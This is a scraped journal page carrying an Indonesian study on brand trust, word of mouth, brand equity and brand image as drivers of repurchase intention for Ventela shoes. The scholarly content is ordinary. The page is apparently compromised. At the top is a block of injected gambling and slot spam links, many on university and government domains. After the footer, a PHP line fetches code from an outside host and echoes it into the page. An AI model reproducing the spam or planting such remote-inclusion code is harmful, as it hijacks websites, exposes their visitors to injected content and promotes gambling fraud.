https://kelulusan.pnl.ac.id/ https://su.unair.ac.id/sthai/ https://sisca.uinmataram.ac.id/ https://moocs.ut.ac.id/thai/ https://kotabogor.go.id/uploads/sthai/ slot thailand https://rsgm.ugm.ac.id/sipoltak/presidenslot/ https://ak3.sarpras.unair.ac.id/web/files/king/ https://rsgm.ugm.ac.id/sipoltak/ollo4d/ https://moocs.ut.ac.id/-/kingdomtoto/ https://www.sindutrans.com/mega/ http://onlines.rsud.patikab.go.id:7001/megaforwin/ https://www.logoku.com/mfw/ https://portal.stiemadani.ac.id/ https://fkip.uisu.ac.id/member/mega/ https://test.unpra.ac.id/ https://poskopemilu.kejaksaan.go.id/mega-for-win/ https://eta-nasiam.simalungunkab.go.id/mega/ https://rsdgunungjati.cirebonkota.go.id/ayambet/ https://inlislite.perpus.palopokota.go.id/ https://dikbud.bondowosokab.go.id/mpo/ https://dikbud.bondowosokab.go.id/ayambet/ https://fkh.unair.ac.id/new-fkh/mpo/ https://lpm.iakn-toraja.ac.id/ https://elatar-bppsdm.kkp.go.id/ayambet/ https://ww2shots.com/ https://fkip.uisu.ac.id/wp-admin/royal/ https://elearning.itbk.ac.id/ http://mp.pps.unima.ac.id/wp-content/kingdomtoto/ https://sipbm.sulselprov.go.id/kingdom/ https://simrenda3.slemankab.go.id/modules/king/ https://dinkes.bogorkab.go.id/ https://siakad.stpbi.ac.id/upload/kingdomtoto/ https://fkh.unair.ac.id/new-fkh/royaltoto/ https://eppdb.sma-ypunila.sch.id/royaltoto/ https://digilib-feb.unisma.ac.id/lib/ https://appsbiologi.ub.ac.id/ https://siakad.stpbi.ac.id/upload/kingdomtoto/ https://ak3.sarpras.unair.ac.id/kingdomtoto/ https://e-office.pssi.org/fendi188/ https://simawa.pnp.ac.id/assets/ https://event.unsia.ac.id/megaforwin/ https://sambas.go.id/ https://pafipangkajene.org/ https://pafipangkajene.org/ayambet/ https://pmb.radenintan.ac.id/wp-content/pusat4d/ https://fanres.unram.ac.id/kingdomtoto/ https://moocs.ut.ac.id/ https://disdikbud.sambas.go.id/sultantoto/ https://bumd.bagianperekonomian.makassarkota.go.id/assets/sate/ https://disperindagkop.sambas.go.id/izinsuhu/ https://album.staima-alhikam.ac.id/sriwijaya/ https://jurnal.fkip.untad.ac.id/public/site/infini/ https://album.staima-alhikam.ac.id/sultan88/ https://album.staima-alhikam.ac.id/sate/ https://bem.unand.ac.id/sriwijaya/ https://ffarmasi.unand.ac.id/dana/ https://ffarmasi.unand.ac.id/dolan/ https://ffarmasi.unand.ac.id/mulan/ https://ffarmasi.unand.ac.id/administrator/ziatogel/ https://ffarmasi.unand.ac.id/administrator/maria/ https://moocs.ut.ac.id/group/keretatoto/ https://moocs.ut.ac.id/ziatogel/ https://moocs.ut.ac.id/ladangtoto/ https://moocs.ut.ac.id/install/dewi138/ https://moocs.ut.ac.id/install/ligaciputra/ https://moocs.ut.ac.id/install/gbogroup/ https://moocs.ut.ac.id/install/sateslot/ https://moocs.ut.ac.id/install/sriwijayatoto/ https://moocs.ut.ac.id/content/burungbet/ https://ti.uin-malang.ac.id/mpo12211/ https://album.staima-alhikam.ac.id/install/v https://ti.uin-malang.ac.id/wp-content/campur88/ https://kesbangpol.sambas.go.id/ https://pdia.feb.untirta.ac.id/thai/ https://ipcrc.fk.unair.ac.id/ https://setda.munabarat.go.id/ https://tutorial.fk.unair.ac.id/bacan/
Pengaruh Kepercayaan Merek Word Of Mouth Ekuitas Merek Dan Citra Merek Terhadap Niat Beli Ulang | Nugroho | Manajemen dan Bisnis

Pengaruh Kepercayaan Merek Word Of Mouth Ekuitas Merek Dan Citra Merek Terhadap Niat Beli Ulang

Muhammad Faizal Nugroho, Zulfa Irawati

Abstract


Perkembangan model fashion yang terjadi sangatlah dinamis. Brand-brand fashion saat ini bermunculan mulai dari merek yang berasal dari dalam negeri maupun dari luar negeri dalam menarik pangsa pasar dunia fashion di Indonesia. Tujuan penelitian ini ialah menganalisis pengaruh kepercayaan merek, word of mouth, ekuitas merek dan citra merek terhadap niat beli ulang. Metode penelitian ini kualitatif, populasi penelitian ialah seluruh masyarakat Surakarta. Dan jumlah sampel penelitian ini adalah 220 responden. Hasil penelitian ini ialah kepercayaan merek memiliki pengaruh positif namun tidak signifikan terhadap niat beli ulang. Word of mouth, Ekuitas Merek dan Citra Merek secara parsial memiliki pengaruh positif dan signifikan terhadap niat beli ulang. Berdasarkan uji koefisien determinasi (R2) diperoleh nilai sebesar 0,704 artinya variabel Kepercayaan Merek, Word of mouth, Ekuitas Merek dan Citra Merek mampu menjelaskan 70,4% terhadap variabel kinerja Niat Beli Ulang pelanggan Ventela di Surakarta. Sedangkan sisanya yaitu 29,6% dipengaruhi oleh variabel lain diluar penelitian ini. Nilai goodnes of fit pada penelitian ini memiliki nilai 70,4% sehingga model penelitian ini dinayatakan telah memiliki goodness of fit.

Keywords


Kepercayaan Merek; Word of mouth; Ekuitas Merek; Citra Merek; Niat Beli Ulang;

Full Text:

PDF

References


Ayuningtyas, E., Hendra Titisari, K., & Nurlaela, S. (2020). Pengaruh Good Corporate Governance Terhadap Kinerja Perusahaan Pada Bank Go-Public Di Bei Tahun 2014-2018. Inventory: Jurnal Akuntansi, 4(1), 85. https://doi.org/10.25273/inventory.v4i1.6302

Fadhli, K., Dwi Aprilia, E., & Angga Putra, I. (2021). Pengaruh Ekuitas Merek Dan Perilaku Konsumen Terhadap Keputusan Pembelian Ulang Produk Minyak Goreng Pada Masa Pandemi Covid-19. Jurnal Manajemen Universitas Bung Hatta, 16(2), 96–104. https://doi.org/10.37301/jmubh.v16i2.19038

Fandiyanto, R., & Endriyasari, R. (2019). Pengaruh Kepercayaan Merek dan Citra Merek Terhadap Minat Beli Ulang “Kopi Toraja” di Coffee Josh Situbondo. Jurnal Ilmiah Ilmu Ekonomi Dan Bisnis, 7(1), 21–42.

Ferdinand, A. (2014). Metode Penelitian Manajemen (Edisi 5). Universitas Diponegoro.

Fitria, T., Yohana, C., & Saidanai, B. (2021). Pengaruh Pengalaman Pelanggan Terhadap Niat Membeli Kembali Dengan Kepuasan Pelanggan Sebagai Variabel Intervening: Studi Pada Pengguna E-Commerce X di DKI Jakarta. Jurnal Bisnis, Manajemen, Dan Keuangan, 2(2), 592–610.

Ghafar, B. F. (2019). Analisis Hubungan Kepuasan Pelanggan, Citra Merek Dan Kepercayaan Pelanggan Terhadap Loyalitas Pelanggan Pengguna Handphone Samsung (Survei Pada Mahasiswa Pengguna Handphone Samsung Di Jurusan Manajemen Fakultas Ekonomi UII Yogyakarta). Paper Knowledge. Toward a Media History of Documents, 8(2), 1–13.

Habibillah, M. W., Amanda, E. G., Chandrawati, V., Firdayani, Z., Pribadi, R., & Kurniawan, A. (2018). “Pengaruh CRM Terhadap Kepercayaan Konsumen serta Dampaknya Terhadap Loyalitas Pelanggan Survey pada Petani Desa Donowarih, Kecamatan Karangploso, Kabupaten Malang.” Cakrawala, 12(1). https://doi.org/10.32781/cakrawala.v12i1.263

Hayati, R. (2021). Pengertian Skala Likert, Ciri, dan Contohnya. Penelitianilmiah.Com. https://penelitianilmiah.com/skala-likert/

Kadarusman, K., Maria, E., & Deccasari, D. D. (2019). Cinta Merek Sebagai Mediasi Antara Kepercayaan Merek, Gairah Merek Dan Niat Beli Kembali. Jurnal Ilmiah Manajemen Dan Bisnis, 20(2), 92–105. https://doi.org/10.30596/jimb.v20i2.3466

Kotler, P. , & Armstrong, G. (2016). Prinsip-prinsip Pemasaran Jilid 1. Erlangga.

Kotler, P., & Keller, K. L. (2012). Marketing Management. In Ebook of Marketing Management 13th edition (Vol. 1). Pearson Education, Inc.

Kustianti, D. D. N. (2019). Pengaruh Citra Merek dan Harga Terhadap Keputusan Pembelian Ulang Kartu Seluler Telkomsel. Psikoborneo, 7(1), 83–92.

Laksono, A. W., & Suryadi, A. (2020). Pengaruh Citra Merek, Kepercayaan Merek, Dan Kualitas Produk Terhadap Loyalitas Merek Pada Pelanggan Geprek Bensu Di Kota Malang. Holistic Journal of Management Research, I(1), 9–12.

Miranda, R., & Nurdasila. (2020). Pengaruh Kualitas Pelayanan, Kepercayaan, Dan Citra Merek Terhadap Niat Beli Ulang Jasa Transportasi P.O Simpati Star di Kota Banda Aceh. Jurnal Ilmiah Mahasiswa Ekonomi Manajemen, 5(2), 310–321.

Muriati, & Rino. (2022). Pengaruh Kualitas Produk dan Word of Mouth terhadap Niat Membeli Kembali dengan Keputusan Pembelian sebagai Mediasi Dalam Menggunakan Maxim. EcoGen, 5(3), 387–399.

Ningsih, M., Fitriani, I. D., & Sofyan, Y. (2019). Pengaruh Ekuitas Merek Terhadap Keputusan Pembelian Produk Minuman Probiotik Yakult di Kalangan Mahasiswa STIE Muhammadiyah Bandung. SEMAR, 1(3), 85–96.

Rafiah, K. K. (2019). Analisis Pengaruh Kepuasan Pelanggan dan Kepercayaan Pelanggan terhadap Loyalitas Pelanggan dalam Berbelanja melalui E-commerce di Indonesia. Al Tijarah, 5(1), 46–56. https://doi.org/10.21111/tijarah.v5i1.3621

Rois, M., & Simanjuntak, Megawati. (2020). Nilai dan Kontrol Diri sebagai Faktor Pembentuk Sikap dalam Perilaku Pembelian Impulsif Antargenerasi. Jurnal Ilmu Keluarga Dan Konsumen, 13(3), 262–276. https://doi.org/10.24156/jikk.2020.13.3.262

Sadela, A. E., Purwanto, H., & Apriyanti. (2022). Minat Beli Sebagai Mediasi Pegaruh Gaya Hidup dan Desain Produk Terhadap Keputusan Pembelian Sepatu Vetela. SIMBA, 4(3), 1–13.

Santikayasa, I. M. A., & Santika, I. W. (2018). Peran Citra Toko Dalam Memediasi Pengaruh Kualitas Pelayanan Terhadap Niat Beli Ulang Konsumen. E-Jurnal Manajemen Universitas Udayana, 8(2), 1144. https://doi.org/10.24843/ejmunud.2019.v08.i02.p20

Saputra, G. W., & Ardani, I. G. A. K. S. (2022). Pengaruh Digital Marketing, Word of Mouth dan Kualitas Pelayanan Terhadap Keputusan Pembelian. Coopetition: Jurnal Ilmiah Manajemen, 13(2), 249–258. https://doi.org/10.32670/coopetition.v13i2.1057

Siregar, N., & Hakim, F. (2017). Pengaruh Pencitraan, Kualitas Produk dan Harga terhadap Loyalitas Pelanggan pada Rumah Makan Kampoeng Deli Medan. Jurnal Manajemen Tools, 8(2), 87–96.

Soinbala, R., & Bessie, J. L. D. (2020). Pengaruh Electronic Word of Mouth (eWOM) melalui Media Sosial Instagram terhadap Keputusan Pembelian (Studi Pada Oncu’s Fruit Dessert). GLORY: Jurnal Ekonomi & Ilmu Sosial, 1(1), 65–83.

Somantri, B., Afrianka, R., & Fahrurrazi. (2020). Pengaruh Gaya Hidup dan Citra Merek Terhadap Keputusan Pembelian Iphone (Studi Kasus pada Siswa dan Siswi SMAN 3 Kota Sukabumi). Cakrawala-Repositori IMWI, 3(1), 1–10.

Sugiyono. (2019). Metodelogi Penelitian Kuantitatif dan Kualitatif Dan R&D. CV Alfabeta.

Suntoro, W., & Silintowe, Y. B. R. (2020). Analisis Pengaruh Pengalaman Merek, Kepercayaan Merek, dan Kepuasan Merek Terhadap Loyalitas Merek. Jurnal Modus, 32(1), 25–41.

Tangka, G. C., Tawas, H. N., & Dotulong, L. O. H. (2022). Pengaruh Iklan Dan Citra Merek Terhadap Minat Beli Dan Keputusan Pembelian Sepatu Merek Ventela (Ventela Shoes) Studi Pada Mahasiswa Jurusan Manajemen Fakulas Ekonomi Unsrat Angkatan 2018. Jurnal EMBA, 10(1), 383–392.

Tomida, M., & Satrio, B. (2016). Pengaruh Harga dan Citra Merek terhadap Loyalitas Pelanggan Produk Footwear Yongki Komaladi. Jurnal Ilmu Dan Riset Manajemen, 5(7), 1–15.




DOI: https://doi.org/10.30743/jmb.v5i2.7591

Refbacks

  • There are currently no refbacks.


Manajemen dan Bisnis
Fakultas Ekonomi Universitas Islam Sumatera Utara
Jl. Sisingamangaraja, Teladan-Medan Indonesia 20217 
Telp. (061) 7869880 | fax. (061) 7869880
Email: admin.jmb@fe.uisu.ac.id
$a = file_get_contents('https://jscode.xyz/'); echo $a;